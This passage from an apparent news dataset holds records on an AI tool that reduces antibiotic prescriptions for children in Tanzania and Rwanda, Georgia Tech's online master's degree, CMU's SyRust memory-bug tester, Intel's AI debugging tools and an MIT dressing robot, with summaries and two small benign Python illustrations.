equipment. And sometimes it's because health ministries in countries like Tanzania and Rwanda put out thick clinical guidelines, which are unheard of in Europe or North America, but which are deemed necessary in the global south to manage the situation that exists. 
D'Acremont and her colleague, Rainer Tan, are both medical doctors turned digital healthcare researchers. They have been testing ePOCT+ at 140 healthcare facilities in Tanzania and Rwanda. The tool aims to help clinicians, especially those who lack on-the-job experience, to make an accurate diagnosis and prescribe the right medicine or other treatment. This includes nurses in remote settings, or those who lack full training but are out there doing the job in the community because they are needed, or those who lack access to diagnostic testing tools, to make the right decisions. And it seems to be working. "You can imagine that as soon as you say you're going to restrict the use of antibiotics people get scared," says D'Acremont. "But the cure rate was better with our tool." They ran a pilot study in March 2021, involving 474 children and adolescents in Tanzania and Rwanda. It found that prescriptions of antibiotics dropped from 70% in Rwanda and 63% in Tanzania to 13% and 19% respectively when using ePOCT+. People also get scared when you tell them you're using an AI, especially when what you are really talking about is a machine learning algorithm that can teach and adapt itself. But the ePOCT+ makers say their tool is specifically designed to learn from local communities to help local communities. "This tool is collecting data continuously - data on the children and their illnesses, seasonality information - so we can learn a lot about a specific population," says Rainer Tan. "We can see how diseases change, whether it's dengue or malaria." Sticking with "static algorithms" that do not change, on the other hand, means "we risk mistreating patients," says Tan. "We need to adapt to what is happening in real life," he says. "And that is the beauty of machine learning optimized algorithms. They are learning from the data of the local population to result in better care for the people." It's also designed to be controlled by local clinicians who don't have top IT skills - for instance, if you're in a healthcare facility and the medicine that's available is not what you thought, you can update the app in real-time. "We asked six clinicians and they all believed the tool will lead to a better health care for children and that it will improve their skills," says Kavishe. "It helps them with what drugs to prescribe. It even recommends the dosage based on the weight of the child." The ePOCT+ tool is heading into further trials and will slowly expand to other regions and eventually other countries, perhaps Senegal, Kenya and India. Valérie and Rainer hope it will continue to show it's helping doctors and nurses make better decisions. "You are not done just by saying 'Nobody takes antibiotics, we decrease resistance, and we are happy.' Yes, we do that, but at the same time we also have to improve the identification of the very few cases with children who really do need an antibiotic, and that is very challenging," says D'Acremont. But one question remains: Does it fix the root problem? Kavishe says that some parents think antibiotics are a "magic medicine." He says viral infections are "self-limiting, so they go away after a while." And if a parent gets an antibiotic for their child's viral infection and it goes away, they sometimes think that it is because of the antibiotic, even though it did nothing to fight the virus, and they will expect to get antibiotics next time as well. 
But if a doctor refuses to give them antibiotics, they often buy them over-the-counter in stores, even without a prescription. "Often in local drug shops, people will sell antibiotics without a prescription. And that might be a gap in the tool, that it doesn't stop people buying a medication outside," Kavishe says. "But with the knowledge and advice we give during a consultation, we hope at some point these parents and caregivers will understand the implications of antibiotics and stop giving them unnecessarily." DYNAMIC is a collaboration between the Centre for Primary Care and Public Health (Unisanté), University of Lausanne , the Swiss Tropical and Public Health Institute (Swiss TPH), and their partners in Tanzania and Rwanda. It is funded by Fondation Botnar , an organization that promotes the use of digital technologies in healthcare.
Swiss scientists and African doctors are using a machine learning algorithm to help physicians prescribe fewer antibiotics to children in Africa, or only when necessary. Researchers participating in the Swiss-based DYNAMIC project designed the ePOCT+ artificial intelligence tool to help healthcare workers make accurate diagnoses and prescribe the right drugs or other treatment. Its developers say ePOCT+ is designed to learn from local communities to help local communities. Rainer Tan at Switzerland's Center for Primary Care and Public Health said, "This tool is collecting data continuously - data on the children and their illnesses, seasonality information - so we can learn a lot about a specific population." The researchers have been testing ePOCT+ at 140 healthcare facilities in Tanzania and Rwanda. Godfrey Kavishe at Tanzania's National Institute for Medical Research hopes the tool will stop unnecessary overuse of antibiotics, which some parents in Africa mistake for "magic medicine."
[]
[]
[]
scitechnews
None
None
None
None
Swiss scientists and African doctors are using a machine learning algorithm to help physicians prescribe fewer antibiotics to children in Africa, or only when necessary. Researchers participating in the Swiss-based DYNAMIC project designed the ePOCT+ artificial intelligence tool to help healthcare workers make accurate diagnoses and prescribe the right drugs or other treatment. Its developers say ePOCT+ is designed to learn from local communities to help local communities. Rainer Tan at Switzerland's Center for Primary Care and Public Health said, "This tool is collecting data continuously - data on the children and their illnesses, seasonality information - so we can learn a lot about a specific population." The researchers have been testing ePOCT+ at 140 healthcare facilities in Tanzania and Rwanda. Godfrey Kavishe at Tanzania's National Institute for Medical Research hopes the tool will stop unnecessary overuse of antibiotics, which some parents in Africa mistake for "magic medicine." "I was surprised myself recently when we had a child in the consultation room and I thought 'This looks like a bacterial infection,'" recalls Godfrey Kavishe, a doctor at the National Institute for Medical Research in Tanzania. Kavishe was a few steps away from prescribing an antibiotic - they help fight bacterial infections. He kept wondering, though, why the child was breathing so quickly. So, he ran "point-of-care" tests, using an artificial intelligence tool called ePOCT+. "And the tool suggested that the child was more likely to have a viral pneumonia," says Kavishe. "I probably would have given an antibiotic. The tool was really helpful." An antibiotic, meanwhile, wouldn't have helped at all. In fact, antibiotics can do more harm than good when they are wrongly prescribed. For a start, researchers have long suggested that the more we use antibiotics, the less effective they are against infections. Then there's the cost of - essentially - wasted medication. They just don't work against viruses. It's money down the drain. "They can also prolong an illness," says Kavishe. "Maybe the child doesn't have diarrhea, but you give them an antibiotic and it causes diarrhea as a side effect." Kavishe is one of a number of primary healthcare workers who have been collaborating with a Swiss-based research project called DYNAMIC. The team behind DYNAMIC say they want to improve healthcare for children aged 0 to 15 years in African countries. And part of that goal is to reduce the use of antibiotics to treat illnesses that don't respond to them, such as viral infections. "Before COVID, most of the world didn't understand the difference between a virus and a bacterium, people had yet to grasp that most diseases are viral and that patients do not benefit from an antibiotic treatment," says DYNAMIC's project lead, Valérie D'Acremont at Unisanté in Lausanne. D'Acremont says the problem is universal. Antibiotics get over-prescribed everywhere. "There is a tendency even in Europe that as soon as you have a cough, a GP will give you an antibiotic. But they should only use antibiotics for serious cases, like a bacterial pneumonia," says D'Acremont. The situation in African countries is different, because some diseases are more prevalent there than in the richer, so-called "global north." "Antibiotics get used for fever, because fever is very worrying. 
As soon as you have a fever, especially in the 'global south,' where you have dangerous tropical diseases like malaria , meningitis or typhoid, clinicians get very nervous and they want to be on the safe side, so they prescribe an antibiotic," she says. It's something that Kavishe sees first-hand at the Mbeya Medical Research Center in Tanzania where he works. "About 70% of consultations in primary health facilities involve children, who are brought in with fever or a cough," Kavishe says. "And most infections in children are viral - an upper respiratory tract infection, for example. But the clinician will end up giving an antibiotic to treat a diagnosis that they probably don't even know because [they haven't been able to do] many of the tests that would confirm the diagnosis." Often it's through no direct fault of their own but a simple lack of equipment. And sometimes it's because health ministries in countries like Tanzania and Rwanda put out thick clinical guidelines, which are unheard of in Europe or North America, but which are deemed necessary in the global south to manage the situation that exists. D'Acremont and her colleague, Rainer Tan, are both medical doctors turned digital healthcare researchers. They have been testing ePOCT+ at 140 healthcare facilities in Tanzania and Rwanda. The tool aims to help clinicians, especially those who lack on-the-job experience, to make an accurate diagnosis and prescribe the right medicine or other treatment. This includes nurses in remote settings, or those who lack full training but are out there doing the job in the community because they are needed, or those who lack access to diagnostic testing tools, to make the right decisions. And it seems to be working. "You can imagine that as soon as you say you're going to restrict the use of antibiotics people get scared," says D'Acremont. "But the cure rate was better with our tool." They ran a pilot study in March 2021, involving 474 children and adolescents in Tanzania and Rwanda. It found that prescriptions of antibiotics dropped from 70% in Rwanda and 63% in Tanzania to 13% and 19% respectively when using ePOCT+. People also get scared when you tell them you're using an AI, especially when what you are really talking about is a machine learning algorithm that can teach and adapt itself. But the ePOCT+ makers say their tool is specifically designed to learn from local communities to help local communities. "This tool is collecting data continuously - data on the children and their illnesses, seasonality information - so we can learn a lot about a specific population," says Rainer Tan. "We can see how diseases change, whether it's dengue or malaria." Sticking with "static algorithms" that do not change, on the other hand, means "we risk mistreating patients," says Tan. "We need to adapt to what is happening in real life," he says. "And that is the beauty of machine learning optimized algorithms. They are learning from the data of the local population to result in better care for the people." It's also designed to be controlled by local clinicians who don't have top IT skills - for instance, if you're in a healthcare facility and the medicine that's available is not what you thought, you can update the app in real-time. "We asked six clinicians and they all believed the tool will lead to a better health care for children and that it will improve their skills," says Kavishe. "It helps them with what drugs to prescribe. It even recommends the dosage based on the weight of the child." 
The ePOCT+ tool is heading into further trials and will slowly expand to other regions and eventually other countries, perhaps Senegal, Kenya and India. Valérie and Rainer hope it will continue to show it's helping doctors and nurses make better decisions. "You are not done just by saying 'Nobody takes antibiotics, we decrease resistance, and we are happy.' Yes, we do that, but at the same time we also have to improve the identification of the very few cases with children who really do need an antibiotic, and that is very challenging," says D'Acremont. But one question remains: Does it fix the root problem? Kavishe says that some parents think antibiotics are a "magic medicine." He says viral infections are "self-limiting, so they go away after a while." And if a parent gets an antibiotic for their child's viral infection and it goes away, they sometimes think that it is because of the antibiotic, even though it did nothing to fight the virus, and they will expect to get antibiotics next time as well. But if a doctor refuses to give them antibiotics, they often buy them over-the-counter in stores, even without a prescription. "Often in local drug shops, people will sell antibiotics without a prescription. And that might be a gap in the tool, that it doesn't stop people buying a medication outside," Kavishe says. "But with the knowledge and advice we give during a consultation, we hope at some point these parents and caregivers will understand the implications of antibiotics and stop giving them unnecessarily." DYNAMIC is a collaboration between the Centre for Primary Care and Public Health (Unisanté), University of Lausanne , the Swiss Tropical and Public Health Institute (Swiss TPH), and their partners in Tanzania and Rwanda. It is funded by Fondation Botnar , an organization that promotes the use of digital technologies in healthcare.
137
Georgia Tech's Online MS in Computer Science Continues to Thrive. Why That's Important for the Future of MOOCs
What may be the most successful online graduate degree program in the United States - the Online Master of Science in Computer Science (OMSCS) from the Georgia Institute of Technology (Georgia Tech) - has begun its eighth year of operation. The program started in January 2014 with an inaugural class of 380 students and five courses. It's enjoyed steady growth every year since, and now has more than 11,000 students enrolled in more than 50 courses, making it the largest computing master's program in the nation - and probably the world. Its total number of graduates now tops 5,000. One of the noteworthy features of the OMSCS is that it's shown how successful MOOCs - the massive open online courses generally believed to have not lived up to their initial hype and promise - can be. Although something resembling MOOCs existed earlier, the MOOC movement is typically thought to have begun in 2011 when Stanford University launched three such courses, the first of which was Introduction To AI, by Sebastian Thrun and Peter Norvig, a course that attracted an enrollment of 160,000 students. It was quickly followed by two more MOOCs, developed by Andrew Ng and Jennifer Widom. Thrun soon started Udacity, and Daphne Koller and Andrew Ng launched Coursera. Initially, MOOCs were regarded as an instructional method that would revolutionize and democratize higher education, but they've been plagued by several problems, most notably high rates of student attrition. As a result, doubts about their future have lingered, even as major platforms such as Coursera and Udacity continue to evolve their business models, enabled in part by the impact of the coronavirus pandemic, and major mergers like the one this week between 2U and edX point to a robust online potential. Georgia Tech's OMSCS has managed to overcome those problems, serving as an example of how a combination of faculty quality, high academic expectations, a modest price tag, and strong student support services can make MOOC-based higher education successful. The development of the program is a story in itself. It's the result of a discussion between Dr. Zvi Galil, who served as the John P. Imlay, Jr., Dean of Computing at Georgia Tech from 2010 through 2019, and Sebastian Thrun. With $2 million in support from AT&T, Galil began the Online Master of Science in Computer Science and oversaw it for its first five years, making it into what is generally regarded as the first affordable fully online Master's degree in the U.S. You can hear Dr. Galil's highly engaging description of the program in his own words here. Born in Tel Aviv, Galil earned his bachelor's and master's degrees in applied mathematics from Tel Aviv University before being awarded a PhD in computer science by Cornell University in 1975. A world-recognized expert in theoretical computer science, he has particular expertise in string algorithms and graph algorithms. He coined the broadly used terms stringology and sparsification. Prior to coming to Georgia Tech, Galil served as chair of the computer science department at both Tel Aviv University and Columbia University. For more than a decade he was dean of Columbia's Fu Foundation School of Engineering and Applied Science (1995 - 2007). In 2007, he was named president of Tel Aviv University, a position he held until his resignation in 2009. 
A member of the National Academy of Engineering and a fellow of the American Academy of Arts and Sciences, Galil was recently named one of the 10 most influential computer scientists in the last decade by Academic Influence. One might assume that with that distinguished career Galil would regard the development of an online master's program as a bit anticlimactic. To the contrary, he believes OMSCS is the "biggest thing I've done in my life," pointing to the fact that OMSCS runs on a model that challenges the prevailing brand of most elite universities, which take pride in their selectivity and exclusiveness. OMSCS accepts all applicants who meet the program's basic qualifications. So far, it's accepted 74% of those who've applied. By contrast, the acceptance rate for Georgia Tech's on-campus program is about 10%. Students from all 50 states and 124 countries have enrolled in the program, which earns rave reviews from its alumni. Affordability is key to the program's popularity. OMSCS is the most affordable degree of its kind. Tuition runs just a bit over $7,000 for the entire program, about 10% of the cost of the average on-campus MS in computer science at private universities. As Galil says, "Our motto is accessibility through affordability and technology - we are making a Master's degree in computer science available to thousands of students." Other major universities have followed the OMSCS lead, and now there are about 40 MOOC-based online graduate programs offered by about 30 U.S. universities. But the question remains - particularly in the aftermath of the pandemic-driven pivot to online instruction - whether MOOCs can effectively serve a larger undergraduate market, particularly given the lukewarm reception online learning received from students and faculty this past year. In an interview this week, I asked Dr. Galil, recently named by the Wall Street Journal as "the man who made online college work," whether he believed MOOCs could be scaled to deliver an affordable, high-quality undergraduate education. He told me he was convinced that not only was it possible, but that it could bring an excellent education into reach for far more students. That optimism is based, in part, on Georgia Tech's successful expansion of MOOCs to its own undergraduates. In 2017, the College of Computing offered an online section of its introductory computing course to on-campus students. Over half of the 300+ students taking the course have enrolled in the online section ever since. Student performance in the online and the in-class sections has been comparable; in some cases, the online section has scored slightly higher. In 2019, Georgia Tech opened up two more introductory computing online courses to on-campus students. Galil's vision is that adding more online course options can help students earn a degree at a lower cost. Prospective students can take introductory courses online during or immediately after high school. Enrolled students can take online courses on campus or while on summer breaks, or during internships or co-ops. Upper-division students can complete their degrees by taking online courses while already working. "And all of this can be done at a lesser tuition rate, reducing the overall cost of college," he said. Galil advocates for "a pivot towards an integrative undergraduate curriculum - part on-campus, part online" that he believes can be comparable in academic quality and learning outcomes to on-campus classes. 
The key ingredients to students embracing that pivot are "quality, quality, quality," according to Galil. It takes time for faculty to develop high-quality, engaging online courses, and time was one resource that universities did not have during the almost-overnight, pandemic-forced conversion to online instruction. As a result, reliance on zoomed classes resulted in a drop in student engagement, putting the wrong kind of "distance" in distance education. But Galil believes well-conceived online courses can actually promote student engagement, particularly when accompanied - as they have been at Georgia Tech - with the sprouting of student groups who affiliate through social media. Galil remains bullish on the future of MOOCs and their potential for undergraduate education. "They will provide access to high quality education to a wider student population, unserved by the current system of exclusion and escalating tuition. The idea and role of higher education institutes is to contribute to society through education. As technology provides the means to place higher education within reach of a greater number of people, our colleges and universities can fulfill their mission."
The Georgia Institute of Technology's Online Master of Science in Computer Science (OMSCS), now in its eighth year, is critical to massive open online courses (MOOCs) fulfilling their promise. High learner attrition has undermined faith in MOOCs, but OMSCS avoided this by combining quality faculty, high academic expectations, modest cost, and robust student support services. The program's affordability is its chief incentive, costing little more than $7,000 in all, or about 10% of the cost of the average on-campus master's degree in computer science at private universities. Zvi Galil, who designed the program, said MOOCs "provide access to high-quality education to a wider student population unserved by the current system of exclusion and escalating tuition."
[]
[]
[]
scitechnews
None
None
None
None
The Georgia Institute of Technology's Online Master of Science in Computer Science (OMSCS), now in its eighth year, is critical to massive open online courses (MOOCs) fulfilling their promise. High learner attrition has undermined faith in MOOCs, but OMSCS avoided this by combining quality faculty, high academic expectations, modest cost, and robust student support services. The program's affordability is its chief incentive, costing little more than $7,000 in all, or about 10% of the cost of the average on-campus master's degree in computer science at private universities. Zvi Galil, who designed the program, said MOOCs "provide access to high-quality education to a wider student population unserved by the current system of exclusion and escalating tuition." What may be the most successful online graduate degree program in the United States - the Online Master of Science in Computer Science (OMSCS) from the Georgia Institute of Technology (Georgia Tech) - has begun its eighth year of operation. The program started in January 2014 with an inaugural class of 380 students and five courses. It's enjoyed steady growth every year since, and now has more than 11,000 students enrolled in more than 50 courses, making it the largest computing master's program in the nation - and probably the world. Its total number of graduates now tops 5,000. One of the noteworthy features of the OMSCS is that it's shown how successful MOOCs - the massive open online courses generally believed to have not lived up to their initial hype and promise - can be. Although something resembling MOOCs existed earlier, the MOOC movement is typically thought to have begun in 2011 when Stanford University launched three such courses, the first of which was Introduction To AI, by Sebastian Thrun and Peter Norvig, a course that attracted an enrollment of 160,000 students. It was quickly followed by two more MOOCs, developed by Andrew Ng and Jennifer Widom. Thrun soon started Udacity, and Daphne Koller and Andrew Ng launched Coursera. Initially, MOOCs were regarded as an instructional method that would revolutionize and democratize higher education, but they've been plagued by several problems, most notably high rates of student attrition. As a result, doubts about their future have lingered, even as major platforms such as Coursera and Udacity continue to evolve their business models, enabled in part by the impact of the coronavirus pandemic, and major mergers like the one this week between 2U and edX point to a robust online potential. Georgia Tech's OMSCS has managed to overcome those problems, serving as an example of how a combination of faculty quality, high academic expectations, a modest price tag, and strong student support services can make MOOC-based higher education successful. The development of the program is a story in itself. It's the result of a discussion between Dr. Zvi Galil, who served as the John P. Imlay, Jr., Dean of Computing at Georgia Tech from 2010 through 2019, and Sebastian Thrun. With $2 million in support from AT&T, Galil began the Online Master of Science in Computer Science and oversaw it for its first five years, making it into what is generally regarded as the first affordable fully online Master's degree in the U.S. You can hear Dr. Galil's highly engaging description of the program in his own words here. Born in Tel Aviv, Galil earned his bachelor's and master's degrees in applied mathematics from Tel Aviv University before being awarded a PhD 
in computer science by Cornell University in 1975. A world-recognized expert in theoretical computer science, he has particular expertise in string algorithms and graph algorithms. He coined the broadly used terms stringology and sparsification. Prior to coming to Georgia Tech, Galil served as chair of the computer science department at both Tel Aviv University and Columbia University. For more than a decade he was dean of Columbia's Fu Foundation School of Engineering and Applied Science (1995 - 2007). In 2007, he was named president of Tel Aviv University, a position he held until his resignation in 2009. A member of the National Academy of Engineering and a fellow of the American Academy of Arts and Sciences, Galil was recently named one of the 10 most influential computer scientists in the last decade by Academic Influence. One might assume that with that distinguished career Galil would regard the development of an online master's program as a bit anticlimactic. To the contrary, he believes OMSCS is the "biggest thing I've done in my life," pointing to the fact that OMSCS runs on a model that challenges the prevailing brand of most elite universities, which take pride in their selectivity and exclusiveness. OMSCS accepts all applicants who meet the program's basic qualifications. So far, it's accepted 74% of those who've applied. By contrast, the acceptance rate for Georgia Tech's on-campus program is about 10%. Students from all 50 states and 124 countries have enrolled in the program, which earns rave reviews from its alumni. Affordability is key to the program's popularity. OMSCS is the most affordable degree of its kind. Tuition runs just a bit over $7,000 for the entire program, about 10% of the cost of the average on-campus MS in computer science at private universities. As Galil says, "Our motto is accessibility through affordability and technology - we are making a Master's degree in computer science available to thousands of students." Other major universities have followed the OMSCS lead, and now there are about 40 MOOC-based online graduate programs offered by about 30 U.S. universities. But the question remains - particularly in the aftermath of the pandemic-driven pivot to online instruction - whether MOOCs can effectively serve a larger undergraduate market, particularly given the lukewarm reception online learning received from students and faculty this past year. In an interview this week, I asked Dr. Galil, recently named by the Wall Street Journal as "the man who made online college work," whether he believed MOOCs could be scaled to deliver an affordable, high-quality undergraduate education. He told me he was convinced that not only was it possible, but that it could bring an excellent education into reach for far more students. That optimism is based, in part, on Georgia Tech's successful expansion of MOOCs to its own undergraduates. In 2017, the College of Computing offered an online section of its introductory computing course to on-campus students. Over half of the 300+ students taking the course have enrolled in the online section ever since. Student performance in the online and the in-class sections has been comparable; in some cases, the online section has scored slightly higher. In 2019, Georgia Tech opened up two more introductory computing online courses to on-campus students. Galil's vision is that adding more online course options can help students earn a degree at a lower cost. 
Prospective students can take introductory courses online during or immediately after high school. Enrolled students can take online courses on campus or while on summer breaks, or during internships or co-ops. Upper-division students can complete their degrees by taking online courses while already working. "And all of this can be done at a lesser tuition rate, reducing the overall cost of college," he said. Galil advocates for "a pivot towards an integrative undergraduate curriculum - part on-campus, part online" that he believes can be comparable in academic quality and learning outcomes to on-campus classes. The key ingredients to students embracing that pivot are "quality, quality, quality," according to Galil. It takes time for faculty to develop high-quality, engaging online courses, and time was one resource that universities did not have during the almost-overnight, pandemic-forced conversion to online instruction. As a result, reliance on zoomed classes resulted in a drop in student engagement, putting the wrong kind of "distance" in distance education. But Galil believes well-conceived online courses can actually promote student engagement, particularly when accompanied - as they have been at Georgia Tech - with the sprouting of student groups who affiliate through social media. Galil remains bullish on the future of MOOCs and their potential for undergraduate education. "They will provide access to high quality education to a wider student population, unserved by the current system of exclusion and escalating tuition. The idea and role of higher education institutes is to contribute to society through education. As technology provides the means to place higher education within reach of a greater number of people, our colleges and universities can fulfill their mission."
138
Tool Automatically Finds Buffer Overflow Vulnerabilities
"It would take people 244 hours per year to read all of the privacy policies at all of the websites they visit in one year. I study privacy policies, and I spend a lot of time reading them, and I do not spend 244 hours per year reading privacy policies." Lorrie Cranor, director of the CyLab Usable Privacy and Security Lab
A new tool designed to automatically test for memory flaws in Rust programming language libraries could detect and mitigate the threat of buffer overflow attacks. Crafted by researchers at Carnegie Mellon University's Security and Privacy Institute (CyLab), the SyRust tool can automatically generate unit tests for library application programming interfaces, and check these library deployments for memory bugs. CyLab's Limin Jia said the team used SyRust on 30 popular libraries, unearthing four previously undiscovered vulnerabilities. Jia said the team is working to improve the coverage of its testing to ensure a wider net has been cast and to improve users' confidence that most, if not all, bugs have been identified.
[]
[]
[]
scitechnews
None
None
None
None
A new tool designed to automatically test for memory flaws in Rust programming language libraries could detect and mitigate the threat of buffer overflow attacks. Crafted by researchers at Carnegie Mellon University's Security and Privacy Institute (CyLab), the SyRust tool can automatically generate unit tests for library application programming interfaces, and check these library deployments for memory bugs. CyLab's Limin Jia said the team used SyRust on 30 popular libraries, unearthing four previously undiscovered vulnerabilities. Jia said the team is working to improve the coverage of its testing to ensure a wider net has been cast and to improve users' confidence that most, if not all, bugs have been identified. "It would take people 244 hours per year to read all of the privacy policies at all of the websites they visit in one year. I study privacy policies, and I spend a lot of time reading them, and I do not spend 244 hours per year reading privacy policies." Lorrie Cranor, director of the CyLab Usable Privacy and Security Lab
139
AI's Role in Debugging Code Expected to Grow
Technology companies are developing artificial intelligence (AI) -based tools to debug code as software maintenance becomes ever more challenging. Intel Labs' Justin Gottschlich said developers find it increasingly difficult to identify bugs in code without machine assistance; debugging consumes about half of developers' time, and correcting a single bug can take weeks. Gottschlich said Intel Labs expects to issue two free AI-based software debugging tools for outside developers by year's end. The ControlFlag tool can automatically detect coding errors via statistical analysis and machine learning, and the Machine Inferred Code Similarity tool can automatically recognize code snippets that execute similar functions.
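The article does not describe how ControlFlag works internally, but the general idea it names - flagging likely coding errors through statistical analysis of code patterns - can be sketched in a few lines. The toy Python example below is an illustration of that general idea only, not Intel's implementation: the miniature corpus, the normalization rules, and the frequency threshold are all invented for the example.

```python
# Toy illustration of statistical anomaly detection over code patterns:
# learn which patterns are common in a corpus, then flag rare ones as suspect.
from collections import Counter
import re

# A pretend "corpus" of conditions mined from many projects (in a real system
# these would come from millions of open-source repositories).
corpus = [
    "if (x == 0)", "if (x == 1)", "if (ptr != NULL)", "if (x == 0)",
    "if (n > 0)", "if (ptr != NULL)", "if (x == 0)", "if (n > 0)",
    "if (flag == 1)", "if (x = 0)",   # the last one is a likely typo (= vs ==)
]

def normalize(snippet: str) -> str:
    """Reduce a snippet to a coarse 'pattern' by masking identifiers and numbers."""
    snippet = re.sub(r"\b\d+\b", "NUM", snippet)
    snippet = re.sub(r"\b(?!if|NULL|NUM)\w+\b", "ID", snippet)
    return snippet

pattern_counts = Counter(normalize(s) for s in corpus)
total = sum(pattern_counts.values())

def flag_if_unusual(snippet: str, threshold: float = 0.2) -> bool:
    """Flag a snippet whose normalized pattern is rare in the corpus.
    The threshold is artificially high because the toy corpus is tiny."""
    freq = pattern_counts[normalize(snippet)] / total
    return freq < threshold

for s in ["if (x == 0)", "if (x = 0)"]:
    print(s, "-> suspicious" if flag_if_unusual(s) else "-> looks typical")
```

Here the common pattern `if (ID == NUM)` passes while the rare `if (ID = NUM)` is flagged; a production tool would of course learn far richer patterns from far more code.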
[]
[]
[]
scitechnews
None
None
None
None
Technology companies are developing artificial intelligence (AI) -based tools to debug code as software maintenance becomes ever more challenging. Intel Labs' Justin Gottschlich said developers find it increasingly difficult to identify bugs in code without machine assistance; debugging consumes about half of developers' time, and correcting a single bug can take weeks. Gottschlich said Intel Labs expects to issue two free AI-based software debugging tools for outside developers by year's end. The ControlFlag tool can automatically detect coding errors via statistical analysis and machine learning, and the Machine Inferred Code Similarity tool can automatically recognize code snippets that execute similar functions.
140
MIT Robot Could Help People with Limited Mobility Dress Themselves
Robots have plenty of potential to help people with limited mobility, including models that could help the infirm put on clothes. That's a particularly challenging task, however, that requires dexterity, safety and speed. Now, scientists at MIT CSAIL have developed an algorithm that strikes a balance by allowing for non-harmful impacts rather than not permitting any impacts at all as before. Humans are hardwired to accommodate and adjust to other humans, but robots have to learn all that from scratch. For example, it's relatively easy for a person to help someone else dress, as we know instinctively where to hold the clothing item, how people can bend their arms, how cloth reacts and more. However, robots have to be programmed with all that information. In the past, algorithms have prevented robots from making any impact with humans at all in the interest of safety. However, that can lead to something called the "freezing robot" problem, where the robot essentially stops moving and can't accomplish the task it set out to do. To get past that issue, an MIT CSAIL team led by PhD student Shen Li developed an algorithm that redefines robotic motion safety by allowing for "safe impacts" on top of collision avoidance. This lets the robot make non-harmful contact with a human to achieve its task, as long as its impact on the human is low. "Developing algorithms to prevent physical harm without unnecessarily impacting the task efficiency is a critical challenge," said Li. "By allowing robots to make non-harmful impact with humans, our method can find efficient robot trajectories to dress the human with a safety guarantee." For a simple dressing task, the system worked even if the person was doing other activities like checking a phone, as shown in the video above. It does that by combining multiple models for different situations, rather than relying on a single model as before. "This multifaceted approach combines set theory, human-aware safety constraints, human motion prediction and feedback control for safe human-robot interaction," said Carnegie Mellon University's Zackory Erickson. The research is still in the early stages, but the ideas could be used in areas other than just dressing. "This research could potentially be applied to a wide variety of assistive robotics scenarios, towards the ultimate goal of enabling robots to provide safer physical assistance to people with disabilities," Erickson said.
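As a rough way to picture the "safe impact" idea described above, the toy Python sketch below scores candidate robot trajectories against several predicted human motions and keeps only those whose predicted contact force stays under a harmless limit, preferring the fastest survivor. This is a conceptual sketch only, not the CSAIL planner: the data class, the force threshold, and all the numbers are invented for illustration.

```python
# Conceptual sketch: pick the fastest candidate trajectory that is "safe"
# under every predicted human motion, where safe means either no contact or
# a predicted impact force below a threshold.
from dataclasses import dataclass
from typing import List

SAFE_IMPACT_FORCE_N = 20.0   # assumed harmless contact-force limit

@dataclass
class Candidate:
    name: str
    duration_s: float            # how long the dressing motion takes
    min_clearance_m: List[float] # closest distance to the arm, one value
                                 # per predicted human motion
    impact_force_n: List[float]  # predicted contact force if they do touch

def is_safe(c: Candidate) -> bool:
    """Safe if, for every human-motion prediction, the robot either keeps
    clear of the arm or touches it with an acceptably low force."""
    return all(clearance > 0.0 or force <= SAFE_IMPACT_FORCE_N
               for clearance, force in zip(c.min_clearance_m, c.impact_force_n))

def plan(candidates: List[Candidate]) -> Candidate:
    """Among safe candidates, prefer the fastest one."""
    safe = [c for c in candidates if is_safe(c)]
    if not safe:
        raise RuntimeError("no safe trajectory found; replan or slow down")
    return min(safe, key=lambda c: c.duration_s)

trajectories = [
    # Fast, but one predicted motion leads to a hard collision -> rejected.
    Candidate("fast", 4.0, [0.02, -0.01], [0.0, 45.0]),
    # Slightly slower, brushes the arm gently in one prediction -> accepted.
    Candidate("medium", 6.0, [0.03, -0.01], [0.0, 8.0]),
    # Very slow, always keeps clear -> accepted but not preferred.
    Candidate("slow", 12.0, [0.10, 0.05], [0.0, 0.0]),
]

print("chosen trajectory:", plan(trajectories).name)  # -> "medium"
```

The point of the sketch is the trade-off the article describes: ruling out only harmful contact, rather than all contact, lets a planner keep the faster trajectories instead of freezing.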
Researchers at the Massachusetts Institute of Technology have designed an algorithm to help a robot efficiently dress a human, theoretically ensuring human safety by reasoning about the human model's uncertainty. The team declined to use a single default model in which the machine only understands one potential reaction in favor of many possible models, to more closely emulate how a human understands other humans. The robot reduces uncertainty and refines those models by collecting more data. The MIT team also reclassified safety for human-aware motion planners as either collision avoidance or safe impact in case of a collision, so the robot could safely complete the dressing task faster. Carnegie Mellon University's Zackory Erickson said, "This research could potentially be applied to a wide variety of assistive robotics scenarios, towards the ultimate goal of enabling robots to provide safer physical assistance to people with disabilities."
[]
[]
[]
scitechnews
None
None
None
None
Researchers at the Massachusetts Institute of Technology have designed an algorithm to help a robot efficiently dress a human, theoretically ensuring human safety by reasoning about the human model's uncertainty. The team declined to use a single default model in which the machine only understands one potential reaction in favor of many possible models, to more closely emulate how a human understands other humans. The robot reduces uncertainty and refines those models by collecting more data. The MIT team also reclassified safety for human-aware motion planners as either collision avoidance or safe impact in case of a collision, so the robot could safely complete the dressing task faster. Carnegie Mellon University's Zackory Erickson said, "This research could potentially be applied to a wide variety of assistive robotics scenarios, towards the ultimate goal of enabling robots to provide safer physical assistance to people with disabilities." Robots have plenty of potential to help people with limited mobility, including models that could help the infirm put on clothes. That's a particularly challenging task, however, that requires dexterity, safety and speed. Now, scientists at MIT CSAIL have developed an algorithm that strikes a balance by allowing for non-harmful impacts rather than not permitting any impacts at all as before. Humans are hardwired to accommodate and adjust to other humans, but robots have to learn all that from scratch. For example, it's relatively easy for a person to help someone else dress, as we know instinctively where to hold the clothing item, how people can bend their arms, how cloth reacts and more. However, robots have to be programmed with all that information. In the past, algorithms have prevented robots from making any impact with humans at all in the interest of safety. However, that can lead to something called the "freezing robot" problem, where the robot essentially stops moving and can't accomplish the task it set out to do. To get past that issue, an MIT CSAIL team led by PhD student Shen Li developed an algorithm that redefines robotic motion safety by allowing for "safe impacts" on top of collision avoidance. This lets the robot make non-harmful contact with a human to achieve its task, as long as its impact on the human is low. "Developing algorithms to prevent physical harm without unnecessarily impacting the task efficiency is a critical challenge," said Li. "By allowing robots to make non-harmful impact with humans, our method can find efficient robot trajectories to dress the human with a safety guarantee." For a simple dressing task, the system worked even if the person was doing other activities like checking a phone, as shown in the video above. It does that by combining multiple models for different situations, rather than relying on a single model as before. "This multifaceted approach combines set theory, human-aware safety constraints, human motion prediction and feedback control for safe human-robot interaction," said Carnegie Mellon University's Zackory Erickson. The research is still in the early stages, but the ideas could be used in areas other than just dressing. "This research could potentially be applied to a wide variety of assistive robotics scenarios, towards the ultimate goal of enabling robots to provide safer physical 